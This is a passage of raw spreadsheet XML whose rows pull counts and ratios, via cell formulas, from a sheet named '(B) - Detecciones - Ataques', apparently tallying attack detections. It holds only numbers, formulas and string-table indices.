        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW56" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX56" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="57" ht="60.0" customHeight="1">
      <c r="B57" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C57" s="143" t="s">
        <v>534</v>
      </c>
      <c r="D57" s="143" t="s">
        <v>535</v>
      </c>
      <c r="E57" s="145" t="s">
        <v>582</v>
      </c>
      <c r="F57" s="280">
        <f>'(B) - Detecciones - Ataques'!P48</f>
        <v>1</v>
      </c>
      <c r="G57" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ48</f>
        <v>1</v>
      </c>
      <c r="H57" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ48</f>
        <v>1</v>
      </c>
      <c r="I57" s="271">
        <f>'(B) - Detecciones - Ataques'!AS48</f>
        <v>0</v>
      </c>
      <c r="J57" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ48</f>
        <v>0</v>
      </c>
      <c r="K57" s="271">
        <f>'(B) - Detecciones - Ataques'!BP48</f>
        <v>0</v>
      </c>
      <c r="L57" s="281">
        <f>'(B) - Detecciones - Ataques'!BW48</f>
        <v>0</v>
      </c>
      <c r="M57" s="271">
        <f>'(B) - Detecciones - Ataques'!CM48</f>
        <v>0</v>
      </c>
      <c r="N57" s="281">
        <f>'(B) - Detecciones - Ataques'!CT48</f>
        <v>0</v>
      </c>
      <c r="O57" s="280">
        <f>'(B) - Detecciones - Ataques'!EC48</f>
        <v>0</v>
      </c>
      <c r="P57" s="281">
        <f>'(B) - Detecciones - Ataques'!ED48</f>
        <v>0</v>
      </c>
      <c r="Q57" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL57" s="287" t="s">
        <v>991</v>
      </c>
      <c r="AM57" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN57" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO57" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP57" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ57" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS57" s="287" t="s">
        <v>991</v>
      </c>
      <c r="AT57" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU57" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV57" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW57" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX57" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="60.0" customHeight="1">
      <c r="B58" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C58" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D58" s="143" t="s">
        <v>588</v>
      </c>
      <c r="E58" s="145" t="s">
        <v>1513</v>
      </c>
      <c r="F58" s="280">
        <f>'(B) - Detecciones - Ataques'!P49</f>
        <v>3</v>
      </c>
      <c r="G58" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ49</f>
        <v>3</v>
      </c>
      <c r="H58" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ49</f>
        <v>1</v>
      </c>
      <c r="I58" s="271">
        <f>'(B) - Detecciones - Ataques'!AS49</f>
        <v>0</v>
      </c>
      <c r="J58" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ49</f>
        <v>0</v>
      </c>
      <c r="K58" s="271">
        <f>'(B) - Detecciones - Ataques'!BP49</f>
        <v>0</v>
      </c>
      <c r="L58" s="281">
        <f>'(B) - Detecciones - Ataques'!BW49</f>
        <v>0</v>
      </c>
      <c r="M58" s="271">
        <f>'(B) - Detecciones - Ataques'!CM49</f>
        <v>3</v>
      </c>
      <c r="N58" s="281">
        <f>'(B) - Detecciones - Ataques'!CT49</f>
        <v>1</v>
      </c>
      <c r="O58" s="280">
        <f>'(B) - Detecciones - Ataques'!EC49</f>
        <v>0</v>
      </c>
      <c r="P58" s="281">
        <f>'(B) - Detecciones - Ataques'!ED49</f>
        <v>0</v>
      </c>
      <c r="Q58" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL58" s="287" t="s">
        <v>1000</v>
      </c>
      <c r="AM58" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN58" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO58" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP58" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ58" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS58" s="287" t="s">
        <v>1000</v>
      </c>
      <c r="AT58" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU58" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV58" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW58" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX58" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="59" ht="60.0" customHeight="1">
      <c r="B59" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C59" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D59" s="143" t="s">
        <v>601</v>
      </c>
      <c r="E59" s="145" t="s">
        <v>607</v>
      </c>
      <c r="F59" s="280">
        <f>'(B) - Detecciones - Ataques'!P51</f>
        <v>1</v>
      </c>
      <c r="G59" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ51</f>
        <v>0</v>
      </c>
      <c r="H59" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ51</f>
        <v>0</v>
      </c>
      <c r="I59" s="271">
        <f>'(B) - Detecciones - Ataques'!AS51</f>
        <v>0</v>
      </c>
      <c r="J59" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ51</f>
        <v>0</v>
      </c>
      <c r="K59" s="271">
        <f>'(B) - Detecciones - Ataques'!BP51</f>
        <v>0</v>
      </c>
      <c r="L59" s="281">
        <f>'(B) - Detecciones - Ataques'!BW51</f>
        <v>0</v>
      </c>
      <c r="M59" s="271">
        <f>'(B) - Detecciones - Ataques'!CM51</f>
        <v>0</v>
      </c>
      <c r="N59" s="281">
        <f>'(B) - Detecciones - Ataques'!CT51</f>
        <v>0</v>
      </c>
      <c r="O59" s="280">
        <f>'(B) - Detecciones - Ataques'!EC51</f>
        <v>0</v>
      </c>
      <c r="P59" s="281">
        <f>'(B) - Detecciones - Ataques'!ED51</f>
        <v>0</v>
      </c>
      <c r="Q59" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL59" s="287" t="s">
        <v>1009</v>
      </c>
      <c r="AM59" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN59" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO59" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP59" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ59" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS59" s="287" t="s">
        <v>1009</v>
      </c>
      <c r="AT59" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU59" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV59" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW59" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX59" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="60" ht="60.0" customHeight="1">
      <c r="B60" s="142" t="s">
        <v>534</v>
      </c>
      <c r="C60" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D60" s="143" t="s">
        <v>613</v>
      </c>
      <c r="E60" s="145" t="s">
        <v>1514</v>
      </c>
      <c r="F60" s="280">
        <f>'(B) - Detecciones - Ataques'!P52</f>
        <v>1</v>
      </c>
      <c r="G60" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ52</f>
        <v>1</v>
      </c>
      <c r="H60" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ52</f>
        <v>1</v>
      </c>
      <c r="I60" s="271">
        <f>'(B) - Detecciones - Ataques'!AS52</f>
        <v>1</v>
      </c>
      <c r="J60" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ52</f>
        <v>1</v>
      </c>
      <c r="K60" s="271">
        <f>'(B) - Detecciones - Ataques'!BP52</f>
        <v>1</v>
      </c>
      <c r="L60" s="281">
        <f>'(B) - Detecciones - Ataques'!BW52</f>
        <v>1</v>
      </c>
      <c r="M60" s="271">
        <f>'(B) - Detecciones - Ataques'!CM52</f>
        <v>1</v>
      </c>
      <c r="N60" s="281">
        <f>'(B) - Detecciones - Ataques'!CT52</f>
        <v>1</v>
      </c>
      <c r="O60" s="280">
        <f>'(B) - Detecciones - Ataques'!EC52</f>
        <v>0</v>
      </c>
      <c r="P60" s="281">
        <f>'(B) - Detecciones - Ataques'!ED52</f>
        <v>0</v>
      </c>
      <c r="Q60" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL60" s="287" t="s">
        <v>1021</v>
      </c>
      <c r="AM60" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN60" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO60" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP60" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ60" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS60" s="287" t="s">
        <v>1021</v>
      </c>
      <c r="AT60" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU60" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV60" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW60" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX60" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="61" ht="60.0" customHeight="1">
      <c r="B61" s="142" t="s">
        <v>534</v>
      </c>
      <c r="C61" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D61" s="143" t="s">
        <v>627</v>
      </c>
      <c r="E61" s="145" t="s">
        <v>1515</v>
      </c>
      <c r="F61" s="280">
        <f>'(B) - Detecciones - Ataques'!P53</f>
        <v>1</v>
      </c>
      <c r="G61" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ53</f>
        <v>0</v>
      </c>
      <c r="H61" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ53</f>
        <v>0</v>
      </c>
      <c r="I61" s="271">
        <f>'(B) - Detecciones - Ataques'!AS53</f>
        <v>0</v>
      </c>
      <c r="J61" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ53</f>
        <v>0</v>
      </c>
      <c r="K61" s="271">
        <f>'(B) - Detecciones - Ataques'!BP53</f>
        <v>0</v>
      </c>
      <c r="L61" s="281">
        <f>'(B) - Detecciones - Ataques'!BW53</f>
        <v>0</v>
      </c>
      <c r="M61" s="271">
        <f>'(B) - Detecciones - Ataques'!CM53</f>
        <v>0</v>
      </c>
      <c r="N61" s="281">
        <f>'(B) - Detecciones - Ataques'!CT53</f>
        <v>0</v>
      </c>
      <c r="O61" s="280">
        <f>'(B) - Detecciones - Ataques'!EC53</f>
        <v>0</v>
      </c>
      <c r="P61" s="281">
        <f>'(B) - Detecciones - Ataques'!ED53</f>
        <v>0</v>
      </c>
      <c r="Q61" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL61" s="287" t="s">
        <v>1031</v>
      </c>
      <c r="AM61" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN61" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO61" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP61" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ61" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS61" s="287" t="s">
        <v>1031</v>
      </c>
      <c r="AT61" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU61" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV61" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW61" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX61" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="60.0" customHeight="1">
      <c r="B62" s="142" t="s">
        <v>534</v>
      </c>
      <c r="C62" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D62" s="143" t="s">
        <v>634</v>
      </c>
      <c r="E62" s="145" t="s">
        <v>638</v>
      </c>
      <c r="F62" s="280">
        <f>'(B) - Detecciones - Ataques'!P54</f>
        <v>1</v>
      </c>
      <c r="G62" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ54</f>
        <v>0</v>
      </c>
      <c r="H62" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ54</f>
        <v>0</v>
      </c>
      <c r="I62" s="271">
        <f>'(B) - Detecciones - Ataques'!AS54</f>
        <v>0</v>
      </c>
      <c r="J62" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ54</f>
        <v>0</v>
      </c>
      <c r="K62" s="271">
        <f>'(B) - Detecciones - Ataques'!BP54</f>
        <v>0</v>
      </c>
      <c r="L62" s="281">
        <f>'(B) - Detecciones - Ataques'!BW54</f>
        <v>0</v>
      </c>
      <c r="M62" s="271">
        <f>'(B) - Detecciones - Ataques'!CM54</f>
        <v>0</v>
      </c>
      <c r="N62" s="281">
        <f>'(B) - Detecciones - Ataques'!CT54</f>
        <v>0</v>
      </c>
      <c r="O62" s="280">
        <f>'(B) - Detecciones - Ataques'!EC54</f>
        <v>0</v>
      </c>
      <c r="P62" s="281">
        <f>'(B) - Detecciones - Ataques'!ED54</f>
        <v>0</v>
      </c>
      <c r="Q62" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL62" s="287" t="s">
        <v>1044</v>
      </c>
      <c r="AM62" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN62" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO62" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP62" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ62" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS62" s="287" t="s">
        <v>1044</v>
      </c>
      <c r="AT62" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU62" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV62" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW62" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX62" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="63" ht="60.0" customHeight="1">
      <c r="B63" s="142" t="s">
        <v>534</v>
      </c>
      <c r="C63" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D63" s="143" t="s">
        <v>645</v>
      </c>
      <c r="E63" s="145" t="s">
        <v>651</v>
      </c>
      <c r="F63" s="280">
        <f>'(B) - Detecciones - Ataques'!P55</f>
        <v>1</v>
      </c>
      <c r="G63" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ55</f>
        <v>0</v>
      </c>
      <c r="H63" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ55</f>
        <v>0</v>
      </c>
      <c r="I63" s="271">
        <f>'(B) - Detecciones - Ataques'!AS55</f>
        <v>0</v>
      </c>
      <c r="J63" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ55</f>
        <v>0</v>
      </c>
      <c r="K63" s="271">
        <f>'(B) - Detecciones - Ataques'!BP55</f>
        <v>0</v>
      </c>
      <c r="L63" s="281">
        <f>'(B) - Detecciones - Ataques'!BW55</f>
        <v>0</v>
      </c>
      <c r="M63" s="271">
        <f>'(B) - Detecciones - Ataques'!CM55</f>
        <v>0</v>
      </c>
      <c r="N63" s="281">
        <f>'(B) - Detecciones - Ataques'!CT55</f>
        <v>0</v>
      </c>
      <c r="O63" s="280">
        <f>'(B) - Detecciones - Ataques'!EC55</f>
        <v>0</v>
      </c>
      <c r="P63" s="281">
        <f>'(B) - Detecciones - Ataques'!ED55</f>
        <v>0</v>
      </c>
      <c r="Q63" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL63" s="287" t="s">
        <v>1052</v>
      </c>
      <c r="AM63" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN63" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO63" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP63" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ63" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS63" s="287" t="s">
        <v>1052</v>
      </c>
      <c r="AT63" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU63" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV63" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW63" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX63" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="64" ht="60.0" customHeight="1">
      <c r="B64" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C64" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D64" s="143" t="s">
        <v>660</v>
      </c>
      <c r="E64" s="145" t="s">
        <v>1516</v>
      </c>
      <c r="F64" s="280">
        <f>'(B) - Detecciones - Ataques'!P56</f>
        <v>1</v>
      </c>
      <c r="G64" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ56</f>
        <v>1</v>
      </c>
      <c r="H64" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ56</f>
        <v>1</v>
      </c>
      <c r="I64" s="271">
        <f>'(B) - Detecciones - Ataques'!AS56</f>
        <v>0</v>
      </c>
      <c r="J64" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ56</f>
        <v>0</v>
      </c>
      <c r="K64" s="271">
        <f>'(B) - Detecciones - Ataques'!BP56</f>
        <v>1</v>
      </c>
      <c r="L64" s="281">
        <f>'(B) - Detecciones - Ataques'!BW56</f>
        <v>1</v>
      </c>
      <c r="M64" s="271">
        <f>'(B) - Detecciones - Ataques'!CM56</f>
        <v>1</v>
      </c>
      <c r="N64" s="281">
        <f>'(B) - Detecciones - Ataques'!CT56</f>
        <v>1</v>
      </c>
      <c r="O64" s="280">
        <f>'(B) - Detecciones - Ataques'!EC56</f>
        <v>1</v>
      </c>
      <c r="P64" s="281">
        <f>'(B) - Detecciones - Ataques'!ED56</f>
        <v>1</v>
      </c>
      <c r="Q64" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL64" s="287" t="s">
        <v>1061</v>
      </c>
      <c r="AM64" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN64" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO64" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP64" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ64" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS64" s="287" t="s">
        <v>1061</v>
      </c>
      <c r="AT64" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU64" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV64" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW64" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX64" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="60.0" customHeight="1">
      <c r="B65" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C65" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D65" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E65" s="145" t="s">
        <v>1517</v>
      </c>
      <c r="F65" s="280">
        <f>'(B) - Detecciones - Ataques'!P57</f>
        <v>150</v>
      </c>
      <c r="G65" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ57</f>
        <v>0</v>
      </c>
      <c r="H65" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ57</f>
        <v>0</v>
      </c>
      <c r="I65" s="271">
        <f>'(B) - Detecciones - Ataques'!AS57</f>
        <v>0</v>
      </c>
      <c r="J65" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ57</f>
        <v>0</v>
      </c>
      <c r="K65" s="271">
        <f>'(B) - Detecciones - Ataques'!BP57</f>
        <v>0</v>
      </c>
      <c r="L65" s="281">
        <f>'(B) - Detecciones - Ataques'!BW57</f>
        <v>0</v>
      </c>
      <c r="M65" s="271">
        <f>'(B) - Detecciones - Ataques'!CM57</f>
        <v>0</v>
      </c>
      <c r="N65" s="281">
        <f>'(B) - Detecciones - Ataques'!CT57</f>
        <v>0</v>
      </c>
      <c r="O65" s="280">
        <f>'(B) - Detecciones - Ataques'!EC57</f>
        <v>0</v>
      </c>
      <c r="P65" s="281">
        <f>'(B) - Detecciones - Ataques'!ED57</f>
        <v>0</v>
      </c>
      <c r="Q65" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL65" s="287" t="s">
        <v>1072</v>
      </c>
      <c r="AM65" s="275">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="AN65" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO65" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP65" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ65" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS65" s="287" t="s">
        <v>1072</v>
      </c>
      <c r="AT65" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU65" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV65" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW65" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX65" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="66" ht="60.0" customHeight="1">
      <c r="B66" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C66" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D66" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E66" s="145" t="s">
        <v>691</v>
      </c>
      <c r="F66" s="280">
        <f>'(B) - Detecciones - Ataques'!P58</f>
        <v>1</v>
      </c>
      <c r="G66" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ58</f>
        <v>0</v>
      </c>
      <c r="H66" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ58</f>
        <v>0</v>
      </c>
      <c r="I66" s="271">
        <f>'(B) - Detecciones - Ataques'!AS58</f>
        <v>0</v>
      </c>
      <c r="J66" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ58</f>
        <v>0</v>
      </c>
      <c r="K66" s="271">
        <f>'(B) - Detecciones - Ataques'!BP58</f>
        <v>0</v>
      </c>
      <c r="L66" s="281">
        <f>'(B) - Detecciones - Ataques'!BW58</f>
        <v>0</v>
      </c>
      <c r="M66" s="271">
        <f>'(B) - Detecciones - Ataques'!CM58</f>
        <v>0</v>
      </c>
      <c r="N66" s="281">
        <f>'(B) - Detecciones - Ataques'!CT58</f>
        <v>0</v>
      </c>
      <c r="O66" s="280">
        <f>'(B) - Detecciones - Ataques'!EC58</f>
        <v>0</v>
      </c>
      <c r="P66" s="281">
        <f>'(B) - Detecciones - Ataques'!ED58</f>
        <v>0</v>
      </c>
      <c r="Q66" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL66" s="287" t="s">
        <v>1089</v>
      </c>
      <c r="AM66" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN66" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO66" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP66" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ66" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS66" s="287" t="s">
        <v>1089</v>
      </c>
      <c r="AT66" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU66" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV66" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW66" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX66" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="60.0" customHeight="1">
      <c r="B67" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C67" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D67" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E67" s="145" t="s">
        <v>701</v>
      </c>
      <c r="F67" s="280">
        <f>'(B) - Detecciones - Ataques'!P59</f>
        <v>1</v>
      </c>
      <c r="G67" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ59</f>
        <v>0</v>
      </c>
      <c r="H67" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ59</f>
        <v>0</v>
      </c>
      <c r="I67" s="271">
        <f>'(B) - Detecciones - Ataques'!AS59</f>
        <v>0</v>
      </c>
      <c r="J67" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ59</f>
        <v>0</v>
      </c>
      <c r="K67" s="271">
        <f>'(B) - Detecciones - Ataques'!BP59</f>
        <v>0</v>
      </c>
      <c r="L67" s="281">
        <f>'(B) - Detecciones - Ataques'!BW59</f>
        <v>0</v>
      </c>
      <c r="M67" s="271">
        <f>'(B) - Detecciones - Ataques'!CM59</f>
        <v>0</v>
      </c>
      <c r="N67" s="281">
        <f>'(B) - Detecciones - Ataques'!CT59</f>
        <v>0</v>
      </c>
      <c r="O67" s="280">
        <f>'(B) - Detecciones - Ataques'!EC59</f>
        <v>0</v>
      </c>
      <c r="P67" s="281">
        <f>'(B) - Detecciones - Ataques'!ED59</f>
        <v>0</v>
      </c>
      <c r="Q67" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL67" s="287" t="s">
        <v>1110</v>
      </c>
      <c r="AM67" s="275">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="AN67" s="275">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="AO67" s="284">
        <f t="shared" si="11"/>
        <v>0.6666666667</v>
      </c>
      <c r="AP67" s="275">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="AQ67" s="285">
        <f t="shared" si="13"/>
        <v>0.6666666667</v>
      </c>
      <c r="AS67" s="287" t="s">
        <v>1110</v>
      </c>
      <c r="AT67" s="275">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="AU67" s="275">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="AV67" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW67" s="275">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="AX67" s="285">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="68" ht="60.0" customHeight="1">
      <c r="B68" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C68" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D68" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E68" s="145" t="s">
        <v>707</v>
      </c>
      <c r="F68" s="280">
        <f>'(B) - Detecciones - Ataques'!P60</f>
        <v>1</v>
      </c>
      <c r="G68" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ60</f>
        <v>0</v>
      </c>
      <c r="H68" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ60</f>
        <v>0</v>
      </c>
      <c r="I68" s="271">
        <f>'(B) - Detecciones - Ataques'!AS60</f>
        <v>0</v>
      </c>
      <c r="J68" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ60</f>
        <v>0</v>
      </c>
      <c r="K68" s="271">
        <f>'(B) - Detecciones - Ataques'!BP60</f>
        <v>0</v>
      </c>
      <c r="L68" s="281">
        <f>'(B) - Detecciones - Ataques'!BW60</f>
        <v>0</v>
      </c>
      <c r="M68" s="271">
        <f>'(B) - Detecciones - Ataques'!CM60</f>
        <v>0</v>
      </c>
      <c r="N68" s="281">
        <f>'(B) - Detecciones - Ataques'!CT60</f>
        <v>0</v>
      </c>
      <c r="O68" s="280">
